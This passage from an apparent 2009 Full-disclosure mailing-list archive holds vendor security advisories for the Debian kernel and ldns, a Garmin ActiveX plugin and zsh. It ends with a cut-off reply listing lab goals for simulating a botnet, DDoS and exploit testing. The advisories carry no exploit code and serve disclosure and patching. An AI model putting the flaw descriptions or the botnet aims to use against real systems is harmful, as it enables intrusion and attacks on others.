http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 57498 f9ec34fbabdcd47e82bdebfd5c61b5d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 148582 ed576121635601eb13f9b1b5b18df158 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 2970576 cb9ff5de4f159be26adb77a1654f9c38 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 5670086 bb6b939d4ee4055d1414e9ee820debde http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 1444844 687c959498ff8554892b1d980ffbcc18 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 5626962 c4292f4eb21a43815f1f034a925b0590 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 57520 099be07a236cfc4990717731bf08139d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 2970532 9d1668579f9a9eb745a44d08b30007da http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 2947446 3e27023a055fdd774b3289b045b7c1a8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 5408972 f39e7ee9bd84c2d635d96cb0716abdd8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 5626908 b1ab2c5891fd1c69b2a14438130f3e4a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 147404 78db167dea1715c9c2fb9c639078da6e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 2947568 a4e433116e8eb0fc50b0f845daeb30d2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 57572 ebb8c12ec07403944bdda2ea032eb658 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 147488 0be2b32820585b651699c20c895c187e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 147840 83572cbe27afda0438768888f54afbd5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 148648 4d7696585231987d7b1d0b89206aa3bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 147812 5b5ec24eb7a1e503e54d1b826d4320f7 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 57658 85d8d9e4220d714f035fdba3945f8a5b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 10749234 c315a6732b4bdc1f2a933a3ab7f70f61 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 10704988 5c8aa657f6e753d564ce28cd5233a870 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 3225012 8b647ba8e8683c216d38d2f65b44c986 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 10441342 67341cf21ca33af97e28a2f50816868d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 10752862 fe7ffe1779f19ed125fe457ff72e2ebf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 173194 5005c744ca39613c7947209667085ec3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 3229378 ec4511d40a9462de41990c6760af6d4d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 6453010 a78d12a91fcaa85d0934fc2c9475156e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 57578 80adaf839f84cc7e7c9848165c280225 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 172678 39720fa936c578899ddac4170d3114f2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 206042 38a98a8b604c552c907ad00ba3d16e2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 10447546 b75fd20c483fd0952ef441cd8ce3fcf3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 10707914 fc789353ab59d224287ccc565cdcb03a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 6463760 392d2db88951658128f7abfd7f8cdb70 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 204844 c7d684a559e09da6d714e71411af18ac http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 203610 f2d365cdbe7b2caf090588c125d8b17a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 205708 4b0f45ae23fc2f0ad3936a9c076c6f0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 57630 9dcc5865c37f2d750da37fc7b4c0f7bc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 3254264 3897f034a6c8cfc24d683a0816718ed1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 204240 2e04c9fccacef2761c4fd3608fdae318 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch2_sparc.deb Size/MD5 checksum: 3249626 fe045b931d67788a718c2040ef440a21 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 204924 da40e61d358b209497bf4c720121154b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-24etch1_sparc.deb Size/MD5 checksum: 57608 7ce928a49a6c81ab639c4dce82429bab These changes will probably be included in the oldstable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ oldstable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/oldstable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAhuEhuANDBmkLRkRAgAqAKCPqCHTY2/R+6U3/EX8JrUByNTTVgCePpFA Fz+cbwaJDuoVsf7uDjw5eYs= =TaC5 -----END PGP SIGNATURE----- From devin at debian.org Thu May 7 07:18:29 2009 From: devin at debian.org (Devin Carraway) Date: Thu, 07 May 2009 06:18:29 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1795-1] New ldns packages fix arbitrary code execution Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1795 security at debian.org http://www.debian.org/security/ Devin Carraway May 07, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : ldns Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-1086 Stefan Kaltenbrunner discovered that ldns, a library and set of utilities to facilitate DNS programming, did not correctly implement a buffer boundary check in its RR DNS record parser. This weakness could enable overflow of a heap buffer if a maliciously-crafted record is parsed, potentially allowing the execution of arbitrary code. The scope of compromise will vary with the context in which ldns is used, and could present either a local or remote attack vector. The old stable distribution (etch) is not affected by this issue. For the stable distribution (lenny), this problem has been fixed in version 1.4.0-1+lenny1. For the unstable distribution (sid), this problem was fixed in version 1.5.1-1. We recommend that you upgrade your ldns packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/ldns/ldns_1.4.0.orig.tar.gz Size/MD5 checksum: 807484 3af0b721222afa8bbfbe6db22b4be613 http://security.debian.org/pool/updates/main/l/ldns/ldns_1.4.0-1+lenny1.diff.gz Size/MD5 checksum: 42602 ec277451483fc47ca762a41871bdd221 http://security.debian.org/pool/updates/main/l/ldns/ldns_1.4.0-1+lenny1.dsc Size/MD5 checksum: 1034 988f2ea0ec08e7ec89ac4990556e4b1a alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_alpha.deb Size/MD5 checksum: 154268 669a25a26228798017e484eac3aa4165 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_alpha.deb Size/MD5 checksum: 352842 60a9e03f7d4369d6f588669c9e3f15b3 http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_alpha.deb Size/MD5 checksum: 133694 a5d8ae4f5c91f94c5ae8fecf03340d5e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_amd64.deb Size/MD5 checksum: 298050 a759b7e90b25fa009718ae97e7394bad http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_amd64.deb Size/MD5 checksum: 123816 861a02e0ba8da5dd26dcfbf795ba66bb http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_amd64.deb Size/MD5 checksum: 147108 de8d28ab89af6f2cb5c8874515551cd2 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_arm.deb Size/MD5 checksum: 274872 abb3892710d70634f9234e242fa36dee http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_arm.deb Size/MD5 checksum: 132434 dbf80b7c12aff2892433305277e8ea57 http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_arm.deb Size/MD5 checksum: 97660 c226ba159ac214ab55a05ca6222d811b armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_armel.deb Size/MD5 checksum: 98754 6419159ea05543740804ae7d00834ec9 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_armel.deb Size/MD5 checksum: 273732 08ed6d16d8c4b355122d25458ef4d8d9 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_armel.deb Size/MD5 checksum: 134780 fecc4ca944671beb5f383468e3d8e4c6 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_hppa.deb Size/MD5 checksum: 119202 7dcb3019e21115dd9288e6718b676f8e http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_hppa.deb Size/MD5 checksum: 304434 1bf6066619bc3b95f09d3d9b868caf52 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_hppa.deb Size/MD5 checksum: 143602 1640c8ff9642882c8364d69a2bb63a10 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_i386.deb Size/MD5 checksum: 113166 0f2dbd1dcd9f92c280a80a5d1a7c0f1a http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_i386.deb Size/MD5 checksum: 136032 d04cfb74c763514f32fbb531c872ede1 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_i386.deb Size/MD5 checksum: 277938 66bb9673496c17fe9d37a2fd490b9dbc ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_ia64.deb Size/MD5 checksum: 346400 ba3051e06f50d61c43bdc5f31cfeed22 http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_ia64.deb Size/MD5 checksum: 155732 3d553d3f0dc981dd46a6e2805da734a7 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_ia64.deb Size/MD5 checksum: 185404 d575976ac67b3039cfbfa8d1f9092bce mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_mips.deb Size/MD5 checksum: 133828 dda7369db1a6ffdf50acc967cfb16d28 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_mips.deb Size/MD5 checksum: 300906 2873ee98d88d660b8c0682c136ae1d9a http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_mips.deb Size/MD5 checksum: 102082 a5046cccee67968a498d77057554ff1a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_mipsel.deb Size/MD5 checksum: 300220 262c6660c652b447fb36c62f28004571 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_mipsel.deb Size/MD5 checksum: 133832 47b9bd225a2590f74101799cc56553e5 http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_mipsel.deb Size/MD5 checksum: 101384 9155b1a75f3a6ba8379cb3cd90a8e3f0 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_powerpc.deb Size/MD5 checksum: 121704 1db8fba9a463d2c13b778e3ce4506166 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_powerpc.deb Size/MD5 checksum: 183408 3fb158b2c0a4cebabf29bb14c40a6f63 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_powerpc.deb Size/MD5 checksum: 292974 83cdffb0fa56120b18674850e37a3adf s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_s390.deb Size/MD5 checksum: 296340 514869e5dbef20738cf1c10ac2bfe365 http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_s390.deb Size/MD5 checksum: 150064 5a2a6856085d05065e6c83fc85acceea http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_s390.deb Size/MD5 checksum: 130754 013a58c936f76cd0014c68d211ec702a sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/ldns/libldns1_1.4.0-1+lenny1_sparc.deb Size/MD5 checksum: 105488 7b61f31b2ff4f083827f87268d86cd27 http://security.debian.org/pool/updates/main/l/ldns/libldns-dev_1.4.0-1+lenny1_sparc.deb Size/MD5 checksum: 279702 ceb4483705cf3b91f0ec266f5eae4f1b http://security.debian.org/pool/updates/main/l/ldns/ldnsutils_1.4.0-1+lenny1_sparc.deb Size/MD5 checksum: 137774 29820cb49b777eff7f8348d39402ceec These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFKAntcU5XKDemr/NIRArXKAJ4h5HdI3hEVSZ1gbemW6X6FJBUL1wCfdCFI +qnS/zHib45B7oiHQpn4LvQ= =qu9g -----END PGP SIGNATURE----- From remove-vuln at secunia.com Thu May 7 08:28:05 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Thu, 7 May 2009 09:28:05 +0200 Subject: [Full-disclosure] Secunia Research: Garmin Communicator Plug-In Domain Locking Security Bypass Message-ID: <200905070728.n477S5e6028176@ca.secunia.com> ====================================================================== Secunia Research 07/05/2009 - Garmin Communicator Plug-In Domain Locking Security Bypass - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software Garmin Communicator Plug-In (npGarmin.dll) version 2.6.4.0. NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Less critical Impact: Security bypass Where: From Remote ====================================================================== 3) Vendor's Description of Software "The Garmin Communicator Plugin lets you connect your Garmin GPS with your favorite website. Once the plugin is installed, just connect your Garmin GPS device to your computer, and you're on your way. The Garmin Communicator can send and retrieve data from any supported website.". Product Link: http://www8.garmin.com/products/communicator/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Garmin Communicator Plug-In, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to a synchronisation error in the GARMINAXCONTROL.GarminAxControl_t.1 ActiveX control (npGarmin.dll). This can be exploited to bypass the domain locking and dialog box presented to the user asking for confirmation that the untrusted site may access private data. Successful exploitation allows full access (such as deleting data, retrieving personal information, or installing firmware updates) to any Garmin GPS products connected to the user's system. ====================================================================== 5) Solution Set the kill-bit for the affected ActiveX control. ====================================================================== 6) Time Table 19/03/2009 - Vendor contacted via web form asking for contact details of security contact. 24/03/2009 - No response from the vendor. Vendor contacted again using various support e-mail addresses. 07/05/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Dyon Balding, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0194 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-16/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From security at mandriva.com Thu May 7 14:06:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 07 May 2009 15:06:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:108 ] zsh Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:108 http://www.mandriva.com/security/ _______________________________________________________________________ Package : zsh Date : May 7, 2009 Affected: 2008.1, 2009.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A stack-based buffer overflow was found in the zsh command interpreter. An attacker could use this flaw to cause a denial of service (zsh crash), when providing a specially-crafted string as input to the zsh shell (CVE-2009-1214, CVE-2009-1215). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1214 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1215 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 3ffec5554436380b52d982e966f24f46 2008.1/i586/zsh-4.3.5-1.1mdv2008.1.i586.rpm 7db4a561d849d9f2b12bfde039e47f0d 2008.1/i586/zsh-doc-4.3.5-1.1mdv2008.1.i586.rpm 7117bc0be4fef486045125ec5d3ae8b6 2008.1/SRPMS/zsh-4.3.5-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 3b01f1cc3e9b7d9988cca68352affc34 2008.1/x86_64/zsh-4.3.5-1.1mdv2008.1.x86_64.rpm bb56035c5e5a69430b786254af3226a0 2008.1/x86_64/zsh-doc-4.3.5-1.1mdv2008.1.x86_64.rpm 7117bc0be4fef486045125ec5d3ae8b6 2008.1/SRPMS/zsh-4.3.5-1.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 9c7b898cf0134e9f93d9dcd6d2af5dc7 2009.0/i586/zsh-4.3.6-1.1mdv2009.0.i586.rpm 4cebe4b90d9173f62e4588b165d1c11f 2009.0/i586/zsh-doc-4.3.6-1.1mdv2009.0.i586.rpm 9b0fbc6077ce65a4716312aaf48e7545 2009.0/SRPMS/zsh-4.3.6-1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ea366ec65fdf8d88e43bfe1bbb6b6878 2009.0/x86_64/zsh-4.3.6-1.1mdv2009.0.x86_64.rpm 2846d6fb8a74b6494d6926d9cb83292c 2009.0/x86_64/zsh-doc-4.3.6-1.1mdv2009.0.x86_64.rpm 9b0fbc6077ce65a4716312aaf48e7545 2009.0/SRPMS/zsh-4.3.6-1.1mdv2009.0.src.rpm Corporate 3.0: 157cfed02aabc347ce1b1843d888c466 corporate/3.0/i586/zsh-4.1.1-6.1.C30mdk.i586.rpm 77a89affd002e10de155eaf589b413d4 corporate/3.0/i586/zsh-doc-4.1.1-6.1.C30mdk.i586.rpm d1356da2d3588dc3d52c8b3e38e3ea6f corporate/3.0/SRPMS/zsh-4.1.1-6.1.C30mdk.src.rpm Corporate 3.0/X86_64: cf3f543880dfe94344ad5a7be601e580 corporate/3.0/x86_64/zsh-4.1.1-6.1.C30mdk.x86_64.rpm 6acd52702032a42c8a01a9b4306c0f63 corporate/3.0/x86_64/zsh-doc-4.1.1-6.1.C30mdk.x86_64.rpm d1356da2d3588dc3d52c8b3e38e3ea6f corporate/3.0/SRPMS/zsh-4.1.1-6.1.C30mdk.src.rpm Corporate 4.0: 95b44fb0b1105739e4f53c96b1264d06 corporate/4.0/i586/zsh-4.2.5-1.1.20060mlcs4.i586.rpm ec31b6b994107a8a9398e7da0598f0bd corporate/4.0/i586/zsh-doc-4.2.5-1.1.20060mlcs4.i586.rpm 4915615f0941e392bd198d6cf2a919a4 corporate/4.0/SRPMS/zsh-4.2.5-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 4e21e19471c133e88c4b9c96586ebbd8 corporate/4.0/x86_64/zsh-4.2.5-1.1.20060mlcs4.x86_64.rpm bda589a2302f93712aaa8aefae00b0e8 corporate/4.0/x86_64/zsh-doc-4.2.5-1.1.20060mlcs4.x86_64.rpm 4915615f0941e392bd198d6cf2a919a4 corporate/4.0/SRPMS/zsh-4.2.5-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAq99mqjQ0CJFipgRAhy0AKDnFqXme2lZB46m3Vz2fwBDkG+JbgCfQnr9 9C17HIFtx8+ljSFTJZEHEr8= =g+9l -----END PGP SIGNATURE----- From mark.sec at gmail.com Thu May 7 15:01:01 2009 From: mark.sec at gmail.com (Mark Sec) Date: Thu, 7 May 2009 09:01:01 -0500 Subject: [Full-disclosure] Howto Simulate a BotNet ? In-Reply-To: <1241672056.4887.1.camel@aadiln-lio> References: <5598cfa10905061607s1a6d81a9y56916698e9ff6a89@mail.gmail.com> <52302.1241660196@turing-police.cc.vt.edu> <1241672056.4887.1.camel@aadiln-lio> Message-ID: <5598cfa10905070701w836babdtca84bbc2e639afc5@mail.gmail.com> Well, Im looking info: 1) See all the traffic (Over botnet) 2) Administering many slaves (Lab) with the master (lab) via IRC, web, etc... 3) Probe attacks DDoS and DoS (Lab) 4) Probe remote and Local Exploits 5) Infected via remote